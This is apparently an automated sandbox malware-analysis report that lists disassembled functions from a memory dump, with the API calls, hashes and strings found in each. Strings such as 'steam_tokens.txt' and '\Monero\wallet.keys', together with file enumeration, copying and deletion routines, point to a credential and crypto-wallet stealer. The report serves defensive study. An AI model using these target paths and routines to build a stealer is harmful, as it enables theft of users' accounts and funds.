Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec8d088117c0b30f3468f66bed42b428fe7ae1fdc6524dd88b1dd1a7a4f61dd
Instruction ID: 83631b986f9f101330e9e36adc03d604d58f659e147c229bb6d2d8323b1e299e
Opcode Fuzzy Hash: 3ec8d088117c0b30f3468f66bed42b428fe7ae1fdc6524dd88b1dd1a7a4f61dd
Instruction Fuzzy Hash: 016139B4D00218DFCB15CF94E986BEEB7F4BB05304F108598E4196B281D735AE98DF92

Function 00355100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

lstrlen.KERNEL32(00000000,00000000,00360ACA), ref: 0035512A

Strings

steam_tokens.txt, xrefs: 0035513F

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 7abb232470d16769d41ceffec118baff8329db2ce826f8fbd6c5f25ba8be7e51
Instruction ID: 42d6e36d9537aa32477f519f1dfed2a8f342b2e9372a5083582e250c71659e68
Opcode Fuzzy Hash: 7abb232470d16769d41ceffec118baff8329db2ce826f8fbd6c5f25ba8be7e51
Instruction Fuzzy Hash: E6F01D7191050866DB06FBB0EC57DED773CAF54301F404258BC576A0A2EF24660DE7A3

Function 00357ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00360E2C), ref: 00357F00
wsprintfA.USER32 ref: 00357F16

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 910abcb01c65ef834589d43cdeecabeb4c4ead17bc50a569b2c7f96afbd7b6ea
Instruction ID: 9f338608ca0fec15767ffa8738bc78dba2452831ad57b09e43f083ff4d36cc74
Opcode Fuzzy Hash: 910abcb01c65ef834589d43cdeecabeb4c4ead17bc50a569b2c7f96afbd7b6ea
Instruction Fuzzy Hash: 8CF096B1904208EBD714CF85DC45FEAF7BCFB44714F00466AF915A2680D77559448BD1

Function 0034B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

lstrlen.KERNEL32(00000000), ref: 0034B9C2
lstrlen.KERNEL32(00000000), ref: 0034B9D6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: d68b2c8c7926d4bb8455da1e4cef438433d3015030a80203bb5c845cf289aa4d
Instruction ID: c739b737cd05e270cb50e45db918b5cde7c11d7da5745abce1eca77af1d91fe0
Opcode Fuzzy Hash: d68b2c8c7926d4bb8455da1e4cef438433d3015030a80203bb5c845cf289aa4d
Instruction Fuzzy Hash: 13E1E0729105189BDB16EBA0CC92DEE7778BF54301F404259F9077A0B1EF346A4DEBA2

Function 0034AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

lstrlen.KERNEL32(00000000), ref: 0034B16A
lstrlen.KERNEL32(00000000), ref: 0034B17E

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 30bb7d31db5d099b0807363b0f02fbc912c3c6c3c47eb1fba3dce051d479e50d
Instruction ID: 5df8b9c441167b6c7447e07fdb22686776e5d0280ae22267670604e0f867fabf
Opcode Fuzzy Hash: 30bb7d31db5d099b0807363b0f02fbc912c3c6c3c47eb1fba3dce051d479e50d
Instruction Fuzzy Hash: 189132719105189BDF06EBA0DC52DEE7778BF14301F504259F907AA0B1EF346A0DEBA2

Function 0034B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

lstrlen.KERNEL32(00000000), ref: 0034B42E
lstrlen.KERNEL32(00000000), ref: 0034B442

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: c3d3fca99726893631bcb733bd2fae8ffc97b85aa40b39b5e29f466c9126e466
Instruction ID: c1699efe2cd4518beada79bed2955acfaef7b81653e351a0ab683d02f281acf8
Opcode Fuzzy Hash: c3d3fca99726893631bcb733bd2fae8ffc97b85aa40b39b5e29f466c9126e466
Instruction Fuzzy Hash: 2F7120719105189BDB06FBA0DC96DEE7778BF54301F404619F903AA1A1EF346A0DEBA2

Function 00354BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354BEA
lstrcat.KERNEL32(?,0136D598), ref: 00354C08

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92

Part of subcall function 00354910: wsprintfA.USER32 ref: 003549B0
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,003608D2), ref: 003549C5
Part of subcall function 00354910: wsprintfA.USER32 ref: 003549E2
Part of subcall function 00354910: PathMatchSpecA.SHLWAPI(?,?), ref: 00354A1E
Part of subcall function 00354910: lstrcat.KERNEL32(?,0136E5B0), ref: 00354A4A
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FF8), ref: 00354A5C
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A70
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FFC), ref: 00354A82
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A96
Part of subcall function 00354910: CopyFileA.KERNEL32(?,?,00000001), ref: 00354AAC
Part of subcall function 00354910: DeleteFileA.KERNEL32(?), ref: 00354B31

Part of subcall function 00354910: wsprintfA.USER32 ref: 00354A07

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: bdd0d7606708ec6ac506f1e830db28bcf205377a50a6100ac97f0bac5ff7e3dc
Instruction ID: 5b73a160bbdb8eaae4e661891a5e0615d6730bb733075af038ef6964ffd5baa5
Opcode Fuzzy Hash: bdd0d7606708ec6ac506f1e830db28bcf205377a50a6100ac97f0bac5ff7e3dc
Instruction Fuzzy Hash: F2410BB750020467E755F7A0EC43EEE337DA795300F008549BD456B196EE756BCC8B92

Function 00346660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00346706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00346753

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
